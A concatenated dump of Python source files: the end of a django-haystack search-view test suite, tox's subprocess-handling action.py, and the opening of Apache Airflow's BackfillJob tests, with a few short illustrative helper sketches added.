reverse("haystack_search"), {"q": "haystack", "page": 1}
)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]["page"].object_list), 3)
response = self.client.get(
reverse("haystack_search"), {"q": "haystack", "page": 2}
)
self.assertEqual(response.status_code, 404)
def test_thread_safety(self):
exceptions = []
def threaded_view(resp_queue, view, request):
time.sleep(2)
try:
view(request)
resp_queue.put(request.GET["name"])
except Exception as e:
exceptions.append(e)
raise
class ThreadedSearchView(SearchView):
def __call__(self, request):
print("Name: %s" % request.GET["name"])
return super().__call__(request)
view = search_view_factory(view_class=ThreadedSearchView)
resp_queue = queue.Queue()
request_1 = HttpRequest()
request_1.GET = {"name": "foo"}
request_2 = HttpRequest()
request_2.GET = {"name": "bar"}
th1 = Thread(target=threaded_view, args=(resp_queue, view, request_1))
th2 = Thread(target=threaded_view, args=(resp_queue, view, request_2))
th1.start()
th2.start()
th1.join()
th2.join()
foo = resp_queue.get()
bar = resp_queue.get()
self.assertNotEqual(foo, bar)
def test_spelling(self):
# Stow.
from django.conf import settings
old = settings.HAYSTACK_CONNECTIONS["default"].get("INCLUDE_SPELLING", None)
settings.HAYSTACK_CONNECTIONS["default"]["INCLUDE_SPELLING"] = True
sv = SearchView()
sv.query = "Nothing"
sv.results = []
sv.build_page = lambda: (None, None)
sv.create_response()
context = sv.get_context()
self.assertIn(
"suggestion",
context,
msg="Spelling suggestions should be present even if"
" no results were returned",
)
self.assertEqual(context["suggestion"], None)
# Restore
settings.HAYSTACK_CONNECTIONS["default"]["INCLUDE_SPELLING"] = old
if old is None:
del settings.HAYSTACK_CONNECTIONS["default"]["INCLUDE_SPELLING"]
@override_settings(ROOT_URLCONF="test_haystack.results_per_page_urls")
class ResultsPerPageTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_custom_results_per_page(self):
response = self.client.get("/search/", {"q": "haystack"})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]["page"].object_list), 1)
self.assertEqual(response.context[-1]["paginator"].per_page, 1)
response = self.client.get("/search2/", {"q": "hello world"})
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context[-1]["page"].object_list), 2)
self.assertEqual(response.context[-1]["paginator"].per_page, 2)
class FacetedSearchViewTestCase(TestCase):
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_search_no_query(self):
response = self.client.get(reverse("haystack_faceted_search"))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context["facets"], {})
def test_empty_results(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict("")
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.get_results(), EmptySearchQuerySet))
def test_default_form(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict("")
fsv.form = fsv.build_form()
self.assertTrue(isinstance(fsv.form, FacetedSearchForm))
def test_list_selected_facets(self):
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict("")
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, [])
fsv = FacetedSearchView()
fsv.request = HttpRequest()
fsv.request.GET = QueryDict(
"selected_facets=author:daniel&selected_facets=author:chris"
)
fsv.form = fsv.build_form()
self.assertEqual(fsv.form.selected_facets, ["author:daniel", "author:chris"])
class BasicSearchViewTestCase(TestCase):
fixtures = ["base_data"]
def setUp(self):
super().setUp()
# Stow.
self.old_unified_index = connections["default"]._index
self.ui = UnifiedIndex()
self.bmmsi = BasicMockModelSearchIndex()
self.bammsi = BasicAnotherMockModelSearchIndex()
self.ui.build(indexes=[self.bmmsi, self.bammsi])
connections["default"]._index = self.ui
# Update the "index".
backend = connections["default"].get_backend()
backend.clear()
backend.update(self.bmmsi, MockModel.objects.all())
def tearDown(self):
connections["default"]._index = self.old_unified_index
super().tearDown()
def test_search_no_query(self):
response = self.client.get(reverse("haystack_basic_search"))
self.assertEqual(response.status_code, 200)
def test_search_query(self):
response = self.client.get(reverse("haystack_basic_search"), {"q": "haystack"})
self.assertEqual(response.status_code, 200)
self.assertEqual(type(response.context[-1]["form"]), ModelSearchForm)
self.assertEqual(len(response.context[-1]["page"].object_list), 3)
self.assertEqual(
response.context[-1]["page"].object_list[0].content_type(), "core.mockmodel"
)
self.assertEqual(response.context[-1]["page"].object_list[0].pk, "1")
self.assertEqual(response.context[-1]["query"], "haystack")
def test_invalid_page(self):
response = self.client.get(
reverse("haystack_basic_search"), {"q": "haystack", "page": "165233"}
)
self.assertEqual(response.status_code, 404)
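# --- Illustrative sketch (editor's addition, not part of the test suite) ------
# ResultsPerPageTestCase above points ROOT_URLCONF at
# "test_haystack.results_per_page_urls"; a URLconf along the lines of the
# helper below would yield the per_page values (1 and 2) that the test asserts
# via ``paginator.per_page``.  The exact contents of that module are not shown
# here, so treat the names and wiring as assumptions.
def _example_results_per_page_urlconf():
    """Return urlpatterns wiring two SearchViews with custom page sizes."""
    from django.conf.urls import url
    from haystack.views import SearchView, search_view_factory

    return [
        url(r"^search/$", search_view_factory(view_class=SearchView, results_per_page=1)),
        url(r"^search2/$", search_view_factory(view_class=SearchView, results_per_page=2)),
    ]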
|
action.py
|
from __future__ import absolute_import, unicode_literals
import os
import pipes
import signal
import subprocess
import sys
import time
from contextlib import contextmanager
from threading import Thread
import py
from tox import reporter
from tox.constants import INFO
from tox.exception import InvocationError
from tox.reporter import Verbosity
from tox.util.lock import get_unique_file
from tox.util.stdlib import is_main_thread
class Action(object):
"""Action is an effort to group operations with the same goal (within reporting)"""
def __init__(
self,
name,
msg,
args,
log_dir,
generate_tox_log,
command_log,
popen,
python,
interrupt_timeout,
terminate_timeout,
):
self.name = name
self.args = args
self.msg = msg
self.activity = self.msg.split(" ", 1)[0]
self.log_dir = log_dir
self.generate_tox_log = generate_tox_log
self.via_popen = popen
self.command_log = command_log
self._timed_report = None
self.python = python
self.interrupt_timeout = interrupt_timeout
self.terminate_timeout = terminate_timeout
def __enter__(self):
msg = "{} {}".format(self.msg, " ".join(map(str, self.args)))
self._timed_report = reporter.timed_operation(self.name, msg)
self._timed_report.__enter__()
return self
def __exit__(self, type, value, traceback):
self._timed_report.__exit__(type, value, traceback)
def setactivity(self, name, msg):
self.activity = name
if msg:
reporter.verbosity0("{} {}: {}".format(self.name, name, msg), bold=True)
else:
reporter.verbosity1("{} {}: {}".format(self.name, name, msg), bold=True)
def info(self, name, msg):
reporter.verbosity1("{} {}: {}".format(self.name, name, msg), bold=True)
def popen(
self,
args,
cwd=None,
env=None,
redirect=True,
returnout=False,
ignore_ret=False,
capture_err=True,
callback=None,
report_fail=True,
):
"""this drives an interaction with a subprocess"""
cwd = py.path.local() if cwd is None else cwd
cmd_args = [str(x) for x in self._rewrite_args(cwd, args)]
cmd_args_shell = " ".join(pipes.quote(i) for i in cmd_args)
stream_getter = self._get_standard_streams(
capture_err, cmd_args_shell, redirect, returnout, cwd,
)
exit_code, output = None, None
with stream_getter as (fin, out_path, stderr, stdout):
try:
process = self.via_popen(
cmd_args,
stdout=stdout,
stderr=stderr,
cwd=str(cwd),
env=os.environ.copy() if env is None else env,
universal_newlines=True,
shell=False,
creationflags=(
subprocess.CREATE_NEW_PROCESS_GROUP
if sys.platform == "win32"
else 0
# needed for Windows signal send ability (CTRL+C)
),
)
except OSError as exception:
exit_code = exception.errno
else:
if callback is not None:
callback(process)
reporter.log_popen(cwd, out_path, cmd_args_shell, process.pid)
output = self.evaluate_cmd(fin, process, redirect)
exit_code = process.returncode
finally:
if out_path is not None and out_path.exists():
lines = out_path.read_text("UTF-8").split("\n")
# the first three lines are the action, cwd, and cmd - strip them
output = "\n".join(lines[3:])
try:
if exit_code and not ignore_ret:
if report_fail:
msg = "invocation failed (exit code {:d})".format(exit_code)
if out_path is not None:
msg += ", logfile: {}".format(out_path)
if not out_path.exists():
msg += " warning log file missing"
reporter.error(msg)
if out_path is not None and out_path.exists():
reporter.separator("=", "log start", Verbosity.QUIET)
reporter.quiet(output)
reporter.separator("=", "log end", Verbosity.QUIET)
raise InvocationError(cmd_args_shell, exit_code, output)
finally:
self.command_log.add_command(cmd_args, output, exit_code)
return output
def evaluate_cmd(self, input_file_handler, process, redirect):
try:
if self.generate_tox_log and not redirect:
if process.stderr is not None:
# prevent deadlock
raise ValueError("stderr must not be piped here")
# we read binary from the process and must write using a binary stream
buf = getattr(sys.stdout, "buffer", sys.stdout)
last_time = time.time()
while True:
# we have to read one byte at a time, otherwise there
# might be no output for a long time with slow tests
data = input_file_handler.read(1)
if data:
buf.write(data)
if b"\n" in data or (time.time() - last_time) > 1:
# we flush on newlines or after 1 second to
# provide quick enough feedback to the user
# when printing a dot per test
buf.flush()
last_time = time.time()
elif process.poll() is not None:
if process.stdout is not None:
process.stdout.close()
break
else:
time.sleep(0.1)
# the seek updates internal read buffers
input_file_handler.seek(0, 1)
input_file_handler.close()
out, _ = process.communicate() # wait to finish
except KeyboardInterrupt as exception:
reporter.error("got KeyboardInterrupt signal")
main_thread = is_main_thread()
while True:
try:
if main_thread:
# spin up a new thread to disable further interrupt on main thread
stopper = Thread(target=self.handle_interrupt, args=(process,))
stopper.start()
stopper.join()
else:
self.handle_interrupt(process)
except KeyboardInterrupt:
continue
break
raise exception
return out
def handle_interrupt(self, process):
"""A three level stop mechanism for children - INT -> TERM -> KILL"""
msg = "from {} {{}} pid {}".format(os.getpid(), process.pid)
if process.poll() is None:
self.info("KeyboardInterrupt", msg.format("SIGINT"))
process.send_signal(signal.CTRL_C_EVENT if sys.platform == "win32" else signal.SIGINT)
if self._wait(process, self.interrupt_timeout) is None:
self.info("KeyboardInterrupt", msg.format("SIGTERM"))
process.terminate()
if self._wait(process, self.terminate_timeout) is None:
self.info("KeyboardInterrupt", msg.format("SIGKILL"))
process.kill()
process.communicate()
@staticmethod
def _wait(process, timeout):
if sys.version_info >= (3, 3):
# python 3 has timeout feature built-in
try:
process.communicate(timeout=timeout)
except subprocess.TimeoutExpired:
pass
else:
# on Python 2 we need to simulate it
delay = 0.01
while process.poll() is None and timeout > 0:
time.sleep(delay)
timeout -= delay
return process.poll()
@contextmanager
def _get_standard_streams(self, capture_err, cmd_args_shell, redirect, returnout, cwd):
stdout = out_path = input_file_handler = None
stderr = subprocess.STDOUT if capture_err else None
if self.generate_tox_log or redirect:
out_path = self.get_log_path(self.name)
with out_path.open("wt") as stdout, out_path.open("rb") as input_file_handler:
msg = "action: {}, msg: {}\ncwd: {}\ncmd: {}\n".format(
self.name.replace("\n", " "),
self.msg.replace("\n", " "),
str(cwd).replace("\n", " "),
cmd_args_shell.replace("\n", " "),
)
stdout.write(msg)
stdout.flush()
input_file_handler.read() # read the header, so it won't be written to stdout
yield input_file_handler, out_path, stderr, stdout
return
if returnout:
stdout = subprocess.PIPE
yield input_file_handler, out_path, stderr, stdout
def get_log_path(self, actionid):
log_file = get_unique_file(self.log_dir, prefix=actionid, suffix=".log")
return log_file
def _rewrite_args(self, cwd, args):
executable = None
if INFO.IS_WIN:
# shebang lines are not honored on Windows, so if it's a Python script
# prepend the interpreter
ext = os.path.splitext(str(args[0]))[1].lower()
if ext == ".py":
executable = str(self.python)
if executable is None:
executable = args[0]
args = args[1:]
new_args = [executable]
# to make the command shorter, try to use relative paths for all subsequent arguments
# note the executable cannot be relative, as Windows applies the cwd after invocation
for arg in args:
if arg and os.path.isabs(str(arg)):
arg_path = py.path.local(arg)
if arg_path.exists() and arg_path.common(cwd) is not None:
potential_arg = cwd.bestrelpath(arg_path)
if len(potential_arg.split("..")) < 2:
# just one parent directory accepted as relative path
arg = potential_arg
new_args.append(str(arg))
return new_args
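# --- Illustrative sketch (editor's addition, not part of tox) -----------------
# The INT -> TERM -> KILL escalation implemented by Action.handle_interrupt()
# above can be reproduced with nothing but the standard library.  The helper
# below is a simplified, Python 3-only sketch of that idea; the timeout values
# are arbitrary assumptions, not tox's defaults.
def _graceful_stop_sketch(process, interrupt_timeout=0.3, terminate_timeout=0.2):
    """Escalate from SIGINT to SIGTERM to SIGKILL until the child exits."""
    import signal
    import subprocess
    import sys

    def _wait(timeout):
        try:
            process.communicate(timeout=timeout)
        except subprocess.TimeoutExpired:
            pass
        return process.poll()

    if process.poll() is None:
        sig = signal.CTRL_C_EVENT if sys.platform == "win32" else signal.SIGINT
        process.send_signal(sig)  # step 1: polite interrupt
        if _wait(interrupt_timeout) is None:
            process.terminate()  # step 2: SIGTERM
            if _wait(terminate_timeout) is None:
                process.kill()  # step 3: SIGKILL
                process.communicate()  # reap the child
    return process.returncode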
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models, configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagRun, Pool, TaskInstance as TI
from airflow.models import DagBag
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be
# removed/created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEquals(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEquals(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
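# --- Illustrative sketch (editor's addition, not Airflow code) ----------------
# The three BaseJobTest cases above pin down how BaseJob.run() maps the outcome
# of _execute() onto the final job state: a normal return and sys.exit(0) both
# end in SUCCESS, while an uncaught exception ends in FAILED (and is re-raised
# to the caller).  The helper below restates that contract for a callback;
# behaviour for nonzero exit codes is not covered by the tests and is therefore
# an assumption.
def _expected_final_state(callback):
    """Return the job state the tests above expect after running ``callback``."""
    try:
        callback()
    except SystemExit as exc:
        return State.SUCCESS if exc.code in (None, 0) else State.FAILED
    except Exception:  # any failure maps to FAILED in the tests above
        return State.FAILED
    return State.SUCCESS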
class BackfillJobTest(unittest.TestCase):
def setUp(self):
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful: not all dags are suitable
for this. For example, a dag that sleeps forever or has no schedule won't
work here, since such dags simply can't be backfilled.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_upstream_failed_tasks(self):
dag = DAG(
dag_id='test_backfill_rerun_upstream_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
t1 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-1',
dag=dag)
t2 = DummyOperator(task_id='test_backfill_rerun_upstream_failed_task-2',
dag=dag)
t1.set_upstream(t2)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UPSTREAM_FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_upstream_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks_without_flag(self):
dag = DAG(
dag_id='test_backfill_rerun_failed',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_rerun_failed_task-1',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_rerun_failed_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.FAILED)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=False
)
with self.assertRaises(AirflowException):
job.run()
def test_backfill_ordered_concurrent_execute(self):
dag = DAG(
dag_id='test_backfill_ordered_concurrent_execute',
start_date=DEFAULT_DATE,
schedule_interval="@daily")
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op5 = DummyOperator(task_id='upstream_level_3')
# order randomly
op2.set_downstream(op3)
op1.set_downstream(op3)
op4.set_downstream(op5)
op3.set_downstream(op4)
dag.clear()
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
# test executor history keeps a list
history = executor.history
# check that the order is right. Every loop has a 'pause' (0) to change state
# from RUNNING to SUCCESS.
# 6,0,3,0,3,0,3,0 = 8 loops
self.assertEqual(8, len(history))
loop_count = 0
while len(history) > 0:
queued_tasks = history.pop(0)
if loop_count == 0:
# first loop should contain 6 tasks (3 days x 2 tasks)
self.assertEqual(6, len(queued_tasks))
if loop_count == 2 or loop_count == 4 or loop_count == 6:
# 3 days x 1 task
self.assertEqual(3, len(queued_tasks))
loop_count += 1
def test_backfill_pooled_tasks(self):
"""
Test that queued tasks are executed by BackfillJob
"""
session = settings.Session()
pool = Pool(pool='test_backfill_pooled_task_pool', slots=1)
session.add(pool)
session.commit()
dag = self.dagbag.get_dag('test_backfill_pooled_task_dag')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# run with timeout because this creates an infinite loop if not
# caught
with timeout(seconds=30):
job.run()
ti = TI(
task=dag.get_task('test_backfill_pooled_task'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_depends_on_past(self):
"""
Test that backfill respects ignore_depends_on_past
"""
dag = self.dagbag.get_dag('test_depends_on_past')
dag.clear()
run_date = DEFAULT_DATE + datetime.timedelta(days=5)
# backfill should deadlock
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
BackfillJob(dag=dag, start_date=run_date, end_date=run_date).run)
BackfillJob(
dag=dag,
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True).run()
# ti should have succeeded
ti = TI(dag.tasks[0], run_date)
ti.refresh_from_db()
self.assertEquals(ti.state, State.SUCCESS)
def test_run_ignores_all_dependencies(self):
"""
Test that run respects ignore_all_dependencies
"""
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
DEFAULT_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=DEFAULT_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
task1_id = 'test_run_dependency_task'
args1 = ['run',
'-A',
dag_id,
task1_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args1))
ti_dependency = TI(
task=dag.get_task(task1_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependency.refresh_from_db()
self.assertEquals(ti_dependency.state, State.FAILED)
task2_id = 'test_run_dependent_task'
args2 = ['run',
'-A',
dag_id,
task2_id,
(DEFAULT_DATE + datetime.timedelta(days=1)).isoformat()]
cli.run(self.parser.parse_args(args2))
ti_dependent = TI(
task=dag.get_task(task2_id),
execution_date=DEFAULT_DATE + datetime.timedelta(days=1))
ti_dependent.refresh_from_db()
self.assertEquals(ti_dependent.state, State.SUCCESS)
def test_run_naive_taskinstance(self):
"""
Test that we can run naive (non-localized) task instances
"""
NAIVE_DATE = datetime.datetime(2016, 1, 1)
dag_id = 'test_run_ignores_all_dependencies'
dag = self.dagbag.get_dag('test_run_ignores_all_dependencies')
dag.clear()
task0_id = 'test_run_dependent_task'
args0 = ['run',
'-A',
dag_id,
task0_id,
NAIVE_DATE.isoformat()]
cli.run(self.parser.parse_args(args0))
ti_dependent0 = TI(
task=dag.get_task(task0_id),
execution_date=NAIVE_DATE)
ti_dependent0.refresh_from_db()
self.assertEquals(ti_dependent0.state, State.FAILED)
def test_cli_backfill_depends_on_past(self):
"""
Test that CLI respects -I argument
"""
dag_id = 'test_dagrun_states_deadlock'
run_date = DEFAULT_DATE + datetime.timedelta(days=1)
args = [
'backfill',
dag_id,
'-l',
'-s',
run_date.isoformat(),
]
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertRaisesRegexp(
AirflowException,
'BackfillJob is deadlocked',
cli.backfill,
self.parser.parse_args(args))
cli.backfill(self.parser.parse_args(args + ['-I']))
ti = TI(dag.get_task('test_depends_on_past'), run_date)
ti.refresh_from_db()
# task ran
self.assertEqual(ti.state, State.SUCCESS)
dag.clear()
def test_cli_receives_delay_arg(self):
"""
Tests that the --delay_on_limit argument is passed correctly to the BackfillJob
"""
dag_id = 'example_bash_operator'
run_date = DEFAULT_DATE
args = [
'backfill',
dag_id,
'-s',
run_date.isoformat(),
'--delay_on_limit',
'0.5',
]
parsed_args = self.parser.parse_args(args)
self.assertEqual(0.5, parsed_args.delay_on_limit)
def _get_dag_test_max_active_limits(self, dag_id, max_active_runs=1):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval="@hourly",
max_active_runs=max_active_runs
)
with dag:
op1 = DummyOperator(task_id='leave1')
op2 = DummyOperator(task_id='leave2')
op3 = DummyOperator(task_id='upstream_level_1')
op4 = DummyOperator(task_id='upstream_level_2')
op1 >> op2 >> op3
op4 >> op3
dag.clear()
return dag
def test_backfill_max_limit_check_within_limit(self):
dag = self._get_dag_test_max_active_limits(
'test_backfill_max_limit_check_within_limit',
max_active_runs=16)
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
executor = TestExecutor(do_update=True)
job = BackfillJob(dag=dag,
start_date=start_date,
end_date=end_date,
executor=executor,
donot_pickle=True)
job.run()
dagruns = DagRun.find(dag_id=dag.dag_id)
self.assertEqual(2, len(dagruns))
self.assertTrue(all([run.state == State.SUCCESS for run in dagruns]))
def test_backfill_max_limit_check(self):
dag_id = 'test_backfill_max_limit_check'
run_id = 'test_dagrun'
start_date = DEFAULT_DATE - datetime.timedelta(hours=1)
end_date = DEFAULT_DATE
dag_run_created_cond = threading.Condition()
def run_backfill(cond):
cond.acquire()
try:
dag = self._get_dag_test_max_active_limits(dag_id)
# this session object is different than the one in the main thread
